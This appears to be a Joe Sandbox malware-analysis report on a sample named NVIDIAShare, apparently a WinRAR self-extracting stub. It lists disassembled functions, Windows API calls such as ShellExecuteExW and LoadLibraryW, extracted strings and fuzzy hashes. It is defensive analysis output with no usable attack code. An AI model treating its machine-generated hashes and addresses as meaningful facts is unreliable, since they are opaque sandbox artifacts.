String ID:
API String ID: 1703294689-0
Opcode ID: a410e23ef94be68e1cac884ec0301330f63077dd553ce9f0ac4f4a74ece202a6
Instruction ID: ae39228f06da8265e714d8c693e5ad332db803b3f5f0ebbb7755172de69e6e96
Opcode Fuzzy Hash: a410e23ef94be68e1cac884ec0301330f63077dd553ce9f0ac4f4a74ece202a6
Instruction Fuzzy Hash: 2FE04F31000154ABCF126F54C988A89BF69FB24341B004454F8898A136CB3ADD51DB90

Function 0100848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01008493

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 70b6d4f424a5b9c79c6cabe885fabd041b3294dc2ce5464bd21dc0bef3d80995
Instruction ID: 1d3ccae0047f45bdf272886294366b4efea02d71dc036bfcf140d33b340f05a1
Opcode Fuzzy Hash: 70b6d4f424a5b9c79c6cabe885fabd041b3294dc2ce5464bd21dc0bef3d80995
Instruction Fuzzy Hash: D082C870D04246AEFF57DB68C894BFABBA9BF15200F0881FAD9C95B1C2D7715684CB60

Function 0101B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0101B7E5

Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101B8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B8EF
IsDialogMessageW.USER32(?,?), ref: 0101B902
TranslateMessage.USER32(?), ref: 0101B910
DispatchMessageW.USER32(?), ref: 0101B91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0101B93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0101B960
GetDlgItem.USER32(?,00000068), ref: 0101B983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0101B99E
SendMessageW.USER32(00000000,000000C2,00000000,010335F4), ref: 0101B9B1

Part of subcall function 0101D453: _wcslen.LIBCMT ref: 0101D47D

SetFocus.USER32(00000000), ref: 0101B9B8
_swprintf.LIBCMT ref: 0101BA24

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

Part of subcall function 0101D4D4: GetDlgItem.USER32(00000068,0105FCB8), ref: 0101D4E8
Part of subcall function 0101D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0101AF07,00000001,?,?,0101B7B9,0103506C,0105FCB8,0105FCB8,00001000,00000000,00000000), ref: 0101D510
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0101D51B
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000C2,00000000,010335F4), ref: 0101D529
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D53F
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0101D559
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D59D
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0101D5AB
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D5BA
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D5E1
Part of subcall function 0101D4D4: SendMessageW.USER32(00000000,000000C2,00000000,010343F4), ref: 0101D5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0101BA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0101BA90
GetTickCount.KERNEL32 ref: 0101BAAE
_swprintf.LIBCMT ref: 0101BAC2
GetLastError.KERNEL32(?,00000011), ref: 0101BAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0101BB43
_swprintf.LIBCMT ref: 0101BB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0101BBD0
GetCommandLineW.KERNEL32 ref: 0101BBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0101BC47
ShellExecuteExW.SHELL32(0000003C), ref: 0101BC6F
Sleep.KERNEL32(00000064), ref: 0101BCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0101BCE2
CloseHandle.KERNEL32(00000000), ref: 0101BCEB
_swprintf.LIBCMT ref: 0101BD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101BD7D
SetDlgItemTextW.USER32(?,00000065,010335F4), ref: 0101BD94
GetDlgItem.USER32(?,00000065), ref: 0101BD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 0101BDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0101BDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101BE68
_wcslen.LIBCMT ref: 0101BEBE
_swprintf.LIBCMT ref: 0101BEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 0101BF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0101BF4C
GetDlgItem.USER32(?,00000068), ref: 0101BF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0101BF6B
GetDlgItem.USER32(?,00000066), ref: 0101BF85
SetWindowTextW.USER32(00000000,0104A472), ref: 0101BFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0101C007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101C01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0101C0BD
EnableWindow.USER32(00000000,00000000), ref: 0101C197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0101C1D9

Part of subcall function 0101C73F: __EH_prolog.LIBCMT ref: 0101C744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0101C1FD

Strings

__tmp_rar_sfx_access_check_%u, xrefs: 0101BAB5
winrarsfxmappingfile.tmp, xrefs: 0101BBA6
STARTDLG, xrefs: 0101B801
LICENSEDLG, xrefs: 0101C0B2
@, xrefs: 0101BB91
"%s"%s, xrefs: 0101BD0D
-el -s2 "-d%s" "-sp%s", xrefs: 0101BB6B
C:\Users\user\Desktop, xrefs: 0101BBC9
%s, xrefs: 0101BED8
<, xrefs: 0101BB84

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-311033401
Opcode ID: 444c392e30a4961383dac8885afb0d4371368f26e53c519e77f6ab95012464e9
Instruction ID: 3ca8557b03994eac0f4a78719fc2f2576b3f7e2568d545669a07dc4b5598366f
Opcode Fuzzy Hash: 444c392e30a4961383dac8885afb0d4371368f26e53c519e77f6ab95012464e9
Instruction Fuzzy Hash: F242FC70944245BBFB329BA4DD49FBE7BBCAB41700F004099F6C5AA0C9CB7E9944CB61

Function 01010863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 0101087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0101088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 010108BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 01010B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01010B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 01010B93
ReadFile.KERNEL32(00000000,?,00007FFE,01033C7C,00000000), ref: 01010BB1
CloseHandle.KERNEL32(00000000), ref: 01010C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 01010C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,01033C7C,?,00000000,?,00000800), ref: 01010C72
GetFileAttributesW.KERNELBASE(?,?,01033C7C,00000800,?,00000000,?,00000800), ref: 01010C9C
GetFileAttributesW.KERNEL32(?,?,01033D44,00000800), ref: 01010CD8

Part of subcall function 0101081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
Part of subcall function 0101081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858

_swprintf.LIBCMT ref: 01010D4A
_swprintf.LIBCMT ref: 01010D96

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

AllocConsole.KERNEL32 ref: 01010D9E
GetCurrentProcessId.KERNEL32 ref: 01010DA8
AttachConsole.KERNEL32(00000000), ref: 01010DAF
_wcslen.LIBCMT ref: 01010DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 01010DD5
WriteConsoleW.KERNEL32(00000000), ref: 01010DDC
Sleep.KERNEL32(00002710), ref: 01010DE7
FreeConsole.KERNEL32 ref: 01010DED
ExitProcess.KERNEL32 ref: 01010DF5

Strings

DXGIDebug.dll, xrefs: 010108FC, 01010C5E
dwmapi.dll, xrefs: 01010927, 01010D0D
uxtheme.dll, xrefs: 01010D17
SetDefaultDllDirectories, xrefs: 010108B9
kernel32, xrefs: 01010873
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 01010D84
SetDllDirectoryW, xrefs: 01010888

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: b0e39c976c49ef3a2a4690eff0a45dbab010ab1bd5406a22c2b7ee2b66c3ec1d
Instruction ID: a00075720e099a0a5763cc4b07fda85e429c3e1a2598b1ee9b278207c0abeed2
Opcode Fuzzy Hash: b0e39c976c49ef3a2a4690eff0a45dbab010ab1bd5406a22c2b7ee2b66c3ec1d
Instruction Fuzzy Hash: 1ED16EB1108385AFD235AF55D888BDFBAECBBC5704F40491DF6C99E144CB398589CBA2

Function 0101C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0101C744

Part of subcall function 0101B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0101B3FB

_wcslen.LIBCMT ref: 0101CA0A
_wcslen.LIBCMT ref: 0101CA13
SetWindowTextW.USER32(?,?), ref: 0101CA71
_wcslen.LIBCMT ref: 0101CAB3
_wcsrchr.LIBVCRUNTIME ref: 0101CBFB
GetDlgItem.USER32(?,00000066), ref: 0101CC36
SetWindowTextW.USER32(00000000,?), ref: 0101CC46
SendMessageW.USER32(00000000,00000143,00000000,0104A472), ref: 0101CC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0101CC7F

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0101CB1A
%s.%d.tmp, xrefs: 0101C940
ProgramFilesDir, xrefs: 0101CB45
<br>, xrefs: 0101C9D4

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: 93d796861626222b25c6fcc9c6e176eb62d0eea3509c693ce24bb5c83fead3ea
Instruction ID: e6db691cefd8ca8a875add66c14126a9a7072d941056ed0adb8c4b6cead1a4d9
Opcode Fuzzy Hash: 93d796861626222b25c6fcc9c6e176eb62d0eea3509c693ce24bb5c83fead3ea
Instruction Fuzzy Hash: 3BE15672940219AAEF25DBA4DD84DEF77BDAB04310F4484A5F689E7044EF78DA848F60

Function 0100DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0100DA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0100DAAC

Part of subcall function 0100C29A: _wcslen.LIBCMT ref: 0100C2A2

Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0

Part of subcall function 01011B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0100BAE9,00000000,?,?,?,0001044E), ref: 01011BA0

_wcslen.LIBCMT ref: 0100DDE9
__fprintf_l.LIBCMT ref: 0100DF1C

Strings

R, xrefs: 0100DC0C
$%s:, xrefs: 0100DEFF
, xrefs: 0100DD6C
*messages***, xrefs: 0100DBC1
,, xrefs: 0100DF57
a, xrefs: 0100DC16
@%s:, xrefs: 0100DF06, 0100DF12
*messages***, xrefs: 0100DBFA
RTL, xrefs: 0100DEDE

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: 554de2427842ed7f446fe33208488465e51625522866402fced92810f7aebd37
Instruction ID: 10198a46e4c69a33095d90e25fc94161ad86905a06cce3ab82b0c1cdb0c49dbe
Opcode Fuzzy Hash: 554de2427842ed7f446fe33208488465e51625522866402fced92810f7aebd37
Instruction Fuzzy Hash: 6332F571900219DBEF66EFA8C840BEE77A5FF58300F40459AFA85AB2C1E771D985CB50

Function 0101D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0101B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
Part of subcall function 0101B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
Part of subcall function 0101B568: IsDialogMessageW.USER32(0001044E,?), ref: 0101B59E
Part of subcall function 0101B568: TranslateMessage.USER32(?), ref: 0101B5AC
Part of subcall function 0101B568: DispatchMessageW.USER32(?), ref: 0101B5B6

GetDlgItem.USER32(00000068,0105FCB8), ref: 0101D4E8
ShowWindow.USER32(00000000,00000005,?,?,?,0101AF07,00000001,?,?,0101B7B9,0103506C,0105FCB8,0105FCB8,00001000,00000000,00000000), ref: 0101D510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0101D51B
SendMessageW.USER32(00000000,000000C2,00000000,010335F4), ref: 0101D529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0101D559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0101D5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0101D5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0101D5E1
SendMessageW.USER32(00000000,000000C2,00000000,010343F4), ref: 0101D5F0

Strings

\, xrefs: 0101D549

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: ea5c29c5deaeae0f865de473f1f5e19640bd9c9fef6064a7ba4ad9a71192ebb7
Instruction ID: c9aa6529565a70fbb63a8f8a88daa3aff777f91894fdf6d2c519e8e4b290dabb
Opcode Fuzzy Hash: ea5c29c5deaeae0f865de473f1f5e19640bd9c9fef6064a7ba4ad9a71192ebb7
Instruction Fuzzy Hash: 2E31C171545341ABE321DF249C5AFAB7FACFB82704F00090DFAD59A194DB6A890887B6

Function 0101D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0101D7AE
ShellExecuteExW.SHELL32(?), ref: 0101D8DE
ShowWindow.USER32(?,00000000), ref: 0101D91D
GetExitCodeProcess.KERNEL32(?,?), ref: 0101D959
CloseHandle.KERNEL32(?), ref: 0101D97F
ShowWindow.USER32(?,00000001), ref: 0101D9E1

Strings

.exe, xrefs: 0101D989
.inf, xrefs: 0101D89A

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 8ecd2789f0b6423568e9c909e6581cf00bc1aa696b3821e235f0f566fc83cddb
Instruction ID: c4ee4b496d4d3682530d07e2f1b62b099e617e5530fc4bf4c4aa353c1e57ac78
Opcode Fuzzy Hash: 8ecd2789f0b6423568e9c909e6581cf00bc1aa696b3821e235f0f566fc83cddb
Instruction Fuzzy Hash: 5F510770404380AAFB719FA8D448BAB7FE6AF81744F04049EFAC89B199D77DC544CB52

Function 0102A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,01025695,01025695,?,?,?,0102ABAC,00000001,00000001,2DE85006), ref: 0102A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0102ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0102AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0102AB35
__freea.LIBCMT ref: 0102AB42

Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38

__freea.LIBCMT ref: 0102AB4B
__freea.LIBCMT ref: 0102AB70

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 7327624c73253e190ce44aaa8aa14dc7a6cceaf8a9f886762efc39c16522b25f
Instruction ID: e17c86f3446af1b8c4c6623feef010b685c642ecf620bf1de52a145ebc82628d
Opcode Fuzzy Hash: 7327624c73253e190ce44aaa8aa14dc7a6cceaf8a9f886762efc39c16522b25f
Instruction Fuzzy Hash: 1B51B472700226EFEB268E68CC51EAFBBEAEB44610B154A69FD84D7542DF34DC50C650

Function 01023B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,01023C35,?,?,01062088,00000000,?,01023D60,00000004,InitializeCriticalSectionEx,01036394,InitializeCriticalSectionEx,00000000), ref: 01023C03

Strings

api-ms-, xrefs: 01023BC3

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 599c4b34abc17fc5aceb73388bc4da6cfbe1af06dde01334e37a4d6efd649e0e
Instruction ID: 315f4e2644b309b458b7cef3ff9711bcc3eb08a1390a7496eea3b5bbdac81b15
Opcode Fuzzy Hash: 599c4b34abc17fc5aceb73388bc4da6cfbe1af06dde01334e37a4d6efd649e0e
Instruction Fuzzy Hash: 7211C435A04235ABDB338E6C9C8079D77A8BB09660F110150FAD1EF284D72AE90087D0

Function 0101ABAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0101ABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 0101ABF9

Part of subcall function 01011FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0100C116,00000000,.exe,?,?,00000800,?,?,?,01018E3C), ref: 01011FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0101ABE9

Strings

EDIT, xrefs: 0101ABCD, 0101ABD8, 0101ABE5
@Ut, xrefs: 0101ABF9

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

